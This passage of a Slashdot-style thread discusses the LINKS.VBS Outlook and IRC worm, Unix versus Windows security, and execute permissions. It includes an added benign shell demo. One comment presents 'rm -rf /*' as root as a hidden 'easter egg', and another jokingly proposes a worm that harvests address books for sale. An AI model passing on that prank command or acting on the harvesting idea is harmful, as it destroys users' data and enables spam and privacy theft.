  114. Dammit, I wish I ran Outlook by jzuska · · Score: 1

    Then I could get a quick porn fix

  115. Re:Unix and Viruses (Addendum.) by mazur · · Score: 2
    One of the biggest safeguards of Unix so far is: the sheer lack of uniformity. Another is (was?) its relatively small install base. About the first point: write a linux executable, and even if you convince enough people to run it, it will fail because there is no single level of Unix installed everywhere. Some kernels will barf on it, others will refuse to execute it. And it won't work on Slowaris, SunOS, HP-(Y)UX, *AIX*, Digital Unix. So a shell script version might work (even then, program features change, as well), but that has the drawback of being readable and thereby easily recognized for what it is.

    The second point, the install base, removes one of the major incentives of the perpetraitors: notoriety. Lack of familiarity might also play a part.

    The third (and maybe biggest?) factor is: Unix users are generally much more educated in computer use, and knowledgeable about it. And with all the M$ targeted viruses about, they will know not to run random binaries from unknown sources. So again, a success-rate limiter, reducing the chance of notoriety.

    Those are in my estimate the main reasons we haven't seen much abuse in the @Unix so far. The only notorious exception being Morris, who wormed himself rather more successfully than intended through sendmail holes.

    Stefan.
    <B5>There is a hole in your mind.</B5>

    --
    The truth shall make you fret. (Ankh-Morpork Times motto)
  116. Re:Good Virus Good Good by nmarshall · · Score: 1

    now that is an idea...

    hmmm, viral propaganda...

    will have to do that for my procrastinators unlimited group.... will start on it next week...


    nmarshall
    #include "standard_disclaimer.h"
    R.U. SIRIUS: THE ONLY POSSIBLE RESPONSE

    --
    nmarshall

    The law is that which is boldly asserted and plausibly maintained..
    --Colonel Burr 1783
  117. Try this: by schon · · Score: 1

    Turn off Javascript before visiting those sites..

    Makes a world of difference (and no, I'm not going to pretend I've never gone smut surfing :o)

  118. This is a bug? by geoffeg · · Score: 4

    Wow, a free app that adds a shortcut to a porn site on my desktop and generously tells all my friends and coworkers. That's not a bug!

    Geoff

  119. MS reinvents the 70s by Urmane · · Score: 1

    Ironic - with the quick and carefree spread of 'net sex comes the spread of viruses

    --

    --
    "I find your lack of faith disturbing." -- Darth Vader
  120. trojans by rodentia · · Score: 1

    ...trojan advertising...

    I thought that's what television was.

    --
    illegitimii non ingravare
  121. Sign me up! by ibpooks · · Score: 1

    Where can I sign up for this excellent service? Getting tons of warezzz pr0n delivered straight to my desktop without having to wade through mIRC! What a feature! Thanks M$.

  122. Previous, not Next, Generation by jhigham · · Score: 3

    Links.vbs predates ILOVEYOU. It scans net blocks looking for open shares and replicating, and was out there in early 2000 at the latest.

  123. XXX Link? by kwsNI · · Score: 1

    Someone want to post the link to the site here on /.? They'll be Slashdotted in no time...

    kwsNI

  124. Maybe -- by cdlu · · Score: 1

    Maybe Microsoft could use the technology of these viruses and .. uhh .. innovate a means of using the iloveyou virus variants to patch all affected computers to invulnerability? :)

    Of course they could - but why would they do something so painfully logical?

  125. Obviousness. by quadong · · Score: 1

    Is there anything that can be said about this that isn't utterly obvious? Happy troll watching!

  126. Why do people still open attachments? by mkoeller · · Score: 1

    I really don't understand this. Of course you could ask why they use Outlook in the first place but that is largely because companies dictate that or because people are simply too lazy to convert all of their message archives.

    But I really wonder why, after all this media attention, even in the conventional media, people still open attachments that they didn't plan. I honestly don't understand it.

    BTW: I still have to receive a single message from these worms.

    --
    "It may be your sole purpose in life to serve as a warning to others."
  127. Suggestions for improvement by cprincipe · · Score: 1

    It would be far better if it forced your browser to one of those whack-a-mole sites that keep popping up additional windows when you attempt to leave.

    Ummmm.....not that I have any first-hand experience with them. I've just heard about them.

    --

    bun-fhuinneog agam!

    1. Re:Suggestions for improvement by cprincipe · · Score: 1

      According to The Gaelic Dictionary of Computer Terms I took it to mean that I had root.

      'Course my Irish is no better than yours, probably. It was a long time ago, and I needed the course.

      --

      bun-fhuinneog agam!

  128. Re:Unix and Viruses (Addendum.) by kz45 · · Score: 1

    One of the biggest safeguards of Unix so far is: the sheer lack of uniformity

    sadly, one of its major downfalls as well.

  129. Ah, but ... by NaughtyEddie · · Score: 1

    A VBS file doesn't need execute permission, because it's not run from the shell. A UNIX email client (MS Outlook for Linux, say) could easily contain a script language, and happily run scripts from non-executable files. I'm sure a shell could be hacked to run shell scripts without execute permissions without much trouble, too. Not that you would do it, but it shows how important it is that every single executable has publicly-available source code so the community can check for such things.

    --

    --
    It's a .88 magnum -- it goes through schools.
    -- Danny Vermin
  130. Re:Execute Permissions by kz45 · · Score: 1

    Unix has a concept of execute permissions

    you're forgetting something...Unix isn't for the End-User, and probably never will be. Most End-Users can barely understand the concept of point/click..let alone the concept of File permissions.

    if a regular client (end-user) uses any *nix flavor, they would be using root, and the same thing could happen. Blame it on the users...not the software. It says DO NOT OPEN, MAY CONTAIN VIRUSES!!!. (and who the fuck would send you a .VBS anyway????).

    but...blame microsoft...it's as good a scapegoat as any

  131. MICROSOFT!!! by woody_jay · · Score: 1

    Come on guys, where's that fancy little patch that you were going to have out soon!! We can't handle the bugs man!!!

    --
    Of course, that's just my opinion, I could be wrong.
  132. Old news by Mamoth · · Score: 1

    Virus scanners already know about this virus. Had a friend with it. So I went to the virus scanner's web site and it showed me how to remove entries in the registry and such.

  133. Not just Outlook by bswick · · Score: 1

    Needless to say, only machines that run outlook and have visual basic scripting available are vulnerable.

    False. Any E-mail client that allows you to open attachments is affected. As for the Visual Basic scripting, only Windows 95 and NT machines with IE 5.0 have it.

  134. LINKS.VBS? and Microsoft Outlook Security Patch by BMIComp · · Score: 2

    I can remember someone trying to send me a file on mirc... called links.vbs, about 6 months ago. I never accepted it, but anybody know what i'm talking about?

    Hopefully we will see an end to these e-mail "worm" viruses. An article at Network World Fusion describes how Microsoft has released a security update for Outlook, which among other things, blocks 38 different file types, like exe, vbs, bat, and others. The funny thing is, scripting is STILL ACTIVATED, unless turned off. Personally, I think scripting is useful, but, for the average user, I feel it should be left off unless the user turns it on. It does, although, prevent scripts from accessing the address book.

    Its funny, "It's a feature, not a bug", yet they issued a patch for it...

  135. Eh? by mindstrm · · Score: 2

    They don't bother us in the slightest, other than the fact that we have to read the stupid news articles. These virii are incapable of bothering us. In fact.. they aren't even really virii. They require the manual intervention of a user to consciously run them.

  136. The for all this is REALLY easy!! by flamingchicken · · Score: 1
    Maybe I am being too simplistic here, but all it takes to totally defeat these .VBS worms/virus attachments is to disassociate the .VBS extension from the wscript.exe application. I have done this to about 50 computers so far, and no adverse effects have been found. This totally stops any .VBS file from executing on the computer. It takes all of about 5 clicks of the mouse to do this.

    Some may see this as a loss of functionality, but the other option is to run the risk that your users nuke their box, and maybe even your mail server.

    --
    Life is Short and Hard like a body building Elf
  137. Just what was intended? by Sick+Boy · · Score: 1
    Ten bucks says this is exactly what Micro$oft had in mind when they built this "feature" into lookOut. After they start charging the poor sheeple month-to-month to use their `OS' (giggle snort), they'll start the force feeding of advertisements.

    They'll probably claim it's to help offset the cost of all the `innovating' they do. Sigh. Time to d/l the latest Debian.
    --

    --
    Does narcissism count as a hobby? --Shawn Latimer
  138. So when are we going to see... by Megane · · Score: 1

    So when are we going to see...

    ...the HOTGRITS virus!

    When you open it, it pours hot grits down your pants and then spreads to pour hot grits down the pants of everyone in your address book. Unless you're Natalie Portman, in which case it removes your clothes and petrifies you.

    After all, there's no better way to say ILOVEYOU than to pour hot grits down someone's pants.

    --
    #naabhaprzrag, #sverubfr-000, #agi-fcbafberq, negvpyr[pynff*=' negvpyr-ary-'] { qvfcynl: abar !vzcbegnag; }
  139. Re:links.vbs on IRC by Morden · · Score: 1

    I'm not sure how you can "see" a .VBS script on IRC, but this particular variant is definitely not the "next generation" of ILOVEYOU, since it went through our office about 6 months ago.

  140. this isn't new. by darkrot · · Score: 1

    The LINKS.VBS (and variants) have been manifesting themselves on IRC for the past year, if not longer. It spreads itself through user idiocy, in the form that the user has to accept the file and run it himself.

    If you want an "interesting" trojan/virus, there's an IRC-spreading virus that keeps a list of words and makes a pseudo-random filename out of them: fireman-having-sex-with-horse.jpg.bat was my favorite that was generated. Variations of this virus exist in .bat, .js, .vbs -- the fun just never seems to stop.

  141. Worm your way into profit! by wickline · · Score: 1

    Don't do anything nasty to the user's computer, just grab all the addresses in their addressbook and email them to yourself. (make sure you have a very high powered server set up to handle the traffic).

    Then sell them!

    You can sell them for more money perhaps since you know something about the users (ie: they use Windows and Outlook) which makes your list a targeted list at that.

    -matt

  142. New Excuse by Ansonmont · · Score: 1

    Now you can say "Hey that porn link was put there by a virus. I wasn't really looking at www.mypeepeesneezed.com"

  143. Re:Old News? by Rico_Suave · · Score: 1
    ...and then the virus authors will find new ways to attack. MS is the target, simply because they have the largest userbase.

    --

  144. Re:Maybe -- Not Such a bad Idea by mOdQuArK! · · Score: 2

    These concepts are probably patented. You shouldn't even be discussing them w/o licensing the technology from the patent holders.

  145. virus? by SuperguyA1 · · Score: 1

    Gee how often do you find yourself asking... Now just how do I get THAT virus?!?

    --
    "as plurdled gabbleblotchits on a lurgid bee" - Prostetnic Vogon Jeltz. (One man's humorous is another mans flamebait)
    1. Re:virus? by SuperguyA1 · · Score: 1

      Vogon poetic licence:)

      --
      "as plurdled gabbleblotchits on a lurgid bee" - Prostetnic Vogon Jeltz. (One man's humorous is another mans flamebait)
    2. Re:virus? by Glytch · · Score: 1

      Wouldn't that be a license to kill?

  146. Is it really News for Nerds anymore? by tyrann98 · · Score: 1

    While I understand that Microsoft-bashing is all the rage right now, new Outlook viruses no longer interest me. With such a gaping hole within Outlook, hundreds of variations could be made and this one seems like a logical extension to the original virus. Unless the virus causes extensive damage or advertises Linux, these postings are getting quite old.

  147. Viral Marketing by subsolar2 · · Score: 1
    This really gives Viral Marketing a new meaning!!

    subsolar

  148. Re:outlook=virus by kz45 · · Score: 1

    microsoft should not be liable at all, here is why: Let's just say the same thing happened in the linux community. Who would we sue then? the distro company? linus? stallman? the creator of the mail-client? This is the problem.


    if there's anyone to blame..it's the stupid users. Microsoft under-estimated their intelligence. I mean shit, if they can't handle windows....Linux is an impossibility. What they need to do is have 6 or 7 different buttons for the different functions of work (get mail,etc,etc). Wow! the problem would just go away then.

  149. the encryption is simple cipher rotation by segmond · · Score: 1

    i got this around early of this year? or was it late last year? anyway, i decided to decipher it and did it with my boss, and when we deciphered the first code, we got another encrypted code, and had to repeat and so on till we were done. It was pretty interesting, not only did it send via outlook, it connected via mirc and tried to send itself to as many people as it could. it is amusing, that was why i was "disappointed" in ILOVEYOU, the guy didn't try to obscure it in any form.

    --
    ------ Curiosity killed the cat. {satisfaction brought it back | it didn't die ignorant | lack of it is killing mankind
  150. Control your desktop! by Shaheen · · Score: 2

    Well then, instead of accommodating this virus, why not take control of your desktop with an alternative shell (like a Window Manager). The main one I use is Litestep.

    --
    You should never take life too seriously - You'll never get out of it alive.
  151. *N*X Easter Egg! by Kowh · · Score: 2

    Deep in the code of every variant of UNIX and Linux sits a very well hidden easter egg!
    Log in as root on any *N*X machine and run "rm -rf /*".
    I can't spoil the easter egg, but after it's done running I'm sure you will be very surprised!

    --

    Note: If you were stupid enough to actually do this, I think we're better off without you in the *N*X world. ;)

  152. "download browser enhancement" by 1010011010 · · Score: 3

    You didn't, by chance, click on the "download browser enhancement" link, did you?

    I've got IE5 and Outlook2k on my Win2k box... and nothing happened by just looking at the site. Are your IE security settings set to "bend me over again"?

    --
    Napster-to-go says "Fill and refill your compatible MP3 player", which is a lie. It's not MP3. It's WMA with DRM.
  153. Execute Permissions by Pingster · · Score: 1

    Nice overview, Christopher. I'd like to add one thing.

    I think you missed mentioning the most important reason why trojan executables and viruses don't spread as easily on Unix systems.

    Unix has a concept of execute permissions.

    Windows will happily execute any file ending in a variety of extensions (and that list is not small or consistently defined). In Unix, on the other hand, you must turn on execute permissions before you can execute a file, and files are created by default without execute permission.

    An attachment saved on a Unix system would generally be treated as data and saved in a non-executable file. The inability to distinguish between commands and data promoted by Windows and Outlook is, i believe, the main factor in ILOVEYOU's devastating success.


    -- ?!ng
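
The behaviour described in comment 153 above, together with the umask detail from comment 106 and the interpreter caveat from comment 129, as an added shell example that is not part of any poster's comment. The function names are hypothetical and the "attachment" is a constructed, harmless script that only echoes a marker.

```shell
#!/bin/sh
# Added example (not from the thread). All function names are hypothetical and
# the "attachment" is constructed: a script that only echoes a marker string.

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Save an attachment the way a mail client does: a plain create-and-write.
# New files are requested with mode 0666 and the umask can only clear bits,
# so no umask value can ever produce an execute bit.
save_attachment() {
    printf '#!/bin/sh\necho payload-ran\n' > "$1"
}

# Octal permission bits of a file (GNU/busybox stat first, BSD stat second).
file_mode() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"
}

# Mode a freshly saved attachment ends up with under a given umask.
mode_under_umask() {
    (
        umask "$1"
        f="$WORK/attachment.$1"
        rm -f "$f"              # recreate, so the mode reflects this umask
        save_attachment "$f"
        file_mode "$f"
    )
}

# Exit status of running the file directly, as a double-click would.
# 126 is the shell's "found, but not executable" status.
direct_exec_status() {
    if "$1" >/dev/null 2>&1; then echo 0; else echo $?; fi
}

# The caveat: an interpreter only needs READ access to its input, so the
# missing execute bit does nothing once something hands the file to one.
interpreter_output() {
    sh "$1" 2>/dev/null
}

report() {
    for m in 022 077 000; do
        echo "umask $m -> mode $(mode_under_umask "$m")"
    done
    f="$WORK/attachment.022"
    echo "direct exec status:        $(direct_exec_status "$f")"
    echo "via interpreter (sh file): $(interpreter_output "$f")"
    chmod u+x "$f"              # the deliberate step the user has to take
    # 0 here unless the temp directory sits on a noexec mount
    echo "after chmod u+x:           $(direct_exec_status "$f")"
}

report
```

The middle two report lines carry the lesson: the missing execute bit stops a direct launch, but not a client or user that passes the file to an interpreter.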

  154. Make you want to... by Black+Art · · Score: 2

    alter the virus to make the porn site the default page for the browser, not just add a desktop link.

    Maybe if Bill gets his default page set to "Naughty Barnyard Nymphos" a few times he will pay more attention to security.

    --
    "Trademarks are the heraldry of the new feudalism."
  155. Rant... by MrKevvy · · Score: 1

    I haven't had a good Piss And Moan here yet....this is as good a time as any.

    Yes, this is old news. I was booting people out of IRC channels for (unknowingly) sending LINKS.VBS over a year ago. It's ancient. It's the grandaddy of VBS worms. Here are the last four articles I submitted to Slashdot:

    1) An article about a proposal, part of the U.S./European Cybercrime Treaty, that may affect (ie ban) certain parts of Linux...namely those used by admins. to break passwords or examine networks.

    2) Right after a page with one set of instructions on de-regionalizing one DVD player was posted, a post with a link to a page with...37 of them. Code-free.

    3) An article on how a team of Canadian and U.S. scientists managed to make clones biologically younger, not older, than the cells they were cloned from. A major breakthrough.

    4) An article about how the U.S. has pushed through stiffer sentencing for minor, profitless copyright violation (ie using Napster) and Napster and IRC are being actively monitored by the FBI...with the stated intention of throwing people in jail for trading MP3's.

    All of these were linked to reputable sources, and were rejected outright, but this stinker slipped through. Want to read the above articles? Well, I lost the URL's. Sorry. I am sure you will find them if you look. Linux users complain that they aren't understood by Windows users...here is an excellent example of the reverse...

    Suggestion? Allow higher-karma people with real e-mail addresses and names to post stories, not just stinkin' comments....moderators can moderate stories and comments up or down. That way, this non-issue would have been flushed down the -1 toilet quickly and would not have wasted our time.

    --
    -- Insert witty one-liner here. --
  156. Re:Maybe -- Not Such a bad Idea by technos · · Score: 2

    I played with the concept as well, albeit less viral in final form. Had a wee little VB client sitting on a port that just did nothing more than report a patch number when queried. An admin script on a *NIX box would, based on patch number, mail out wrapped updates to responsible users and complain if they weren't installing them in a timely fashion. (Rechecked the patch # in one hour, mail a complaint to the user, and if unchanged in 12 it would mail a notice to me) When executed, the update wrapper would query all of the machines in that segment, ask the server if they had been bothered, and mail itself to them too if required. (Only needed to 'seed' a list of fifty users this way; The BSD box was WAY underpowered too.)

    --
    .sig: Now legally binding!
  157. Good Virus Good Good by mizhi · · Score: 1

    Oh boy... now I can get even more unsolicited email for porn sites. It's only a matter of time before someone uses this to send even more horrifying content... Activist Propaganda! At least I get some amount of amusement out of porn. =)

    --
    Humorless sig goes here.
  158. links.vbs on IRC by kaoticus · · Score: 1

    I actually saw this vb script about a year ago on IRC. Anyone else?

  159. Think people, think! by mszeto · · Score: 1

    If this virus links to a specific site, the people who own that site are pretty stupid. Sure, you'll get hits (if people ACTUALLY click on the obviously porn shortcut on the desktop) but this country is just looking for people to blame, charge, and potentially jail with regards to anything virus related. Ugh.

  160. This is *not* a variant of ILOVEYOU... by stx23 · · Score: 5

    ...but rather a precursor. It's almost a year old. Details here.

  161. THIS ISN'T NEW! by NetJunkie · · Score: 1

    This is the old FreeLink virus. Someone needs to check their facts.... Move on, nothing to see here.